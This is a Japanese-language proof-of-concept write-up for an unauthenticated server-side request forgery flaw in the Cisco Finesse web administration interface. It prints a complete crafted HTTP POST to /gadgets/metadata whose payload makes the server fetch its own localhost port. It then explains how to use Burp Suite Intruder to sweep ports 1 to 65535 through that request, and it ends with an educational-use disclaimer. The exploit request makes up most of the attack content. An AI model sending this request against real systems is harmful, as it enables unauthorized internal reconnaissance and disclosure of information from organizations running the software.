
Cisco Finesse の Web ベース管理インターフェースの脆弱性により、認証されていないリモートの攻撃者が影響を受けるシステムに対して SSRF 攻撃を実行できる可能性があります。
この脆弱性は、影響を受けるシステムに送信される特定の HTTP リクエストに対して、ユーザーが提供する入力の検証が不十分であることに起因します。攻撃者は、細工された HTTP リクエストを影響を受けるデバイスに送信することで、この脆弱性を悪用する可能性があります。悪用に成功すると、攻撃者は影響を受けるデバイスに関連付けられたサービスの限定的な機密情報を取得できる可能性があります。
<target> を実際のものに置き換えた後、サーバーの localhost のポート番号「8444」からの応答を確認します。POST /gadgets/metadata HTTP/2
Host: <target>:8445
Cookie: timeBeforeFailover=1695808242310; timeBeforeAttemptingLoginInIframe=1695808244317; attemptsMade=1; seqNumberGenerated=1; finesse_ag_extension=<extension>; activeDeviceId4000=SEPD4AD717A03F6; timeBeforeLoadingOtherSide=1695808249678
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: application/json
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://<target>:8445/desktop/container;jsessionid=90aE172355707490406528141464742B/?locale=en_US
Content-Type: application/json
Content-Length: 127
Origin: https://<target>:8445
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
{"context":{"container":"default","language":"en","country":"US","locale":"en_US"},"gadgets":[{"url":"http://127.0.0.1:8444"}]}

Burp Suite Intruder を使用して、Cisco Finesse Web ベース管理サーバーのすべてのオープンポートを、ポート番号 1 から 65535 まで変更してスキャンします。
クローズされたポートでは、「Connection refused」応答が表示されます。


これは、Cisco Finesse Web ベース管理インターフェースが Server Side Request Forgery (SSRF) に対して脆弱であることを示すための概念実証 (PoC) であり、教育目的のみを意図しています。責任を持って、テストする明示的な許可があるシステムでのみ使用してください。この PoC を誤用すると、深刻な結果を招く可能性があります。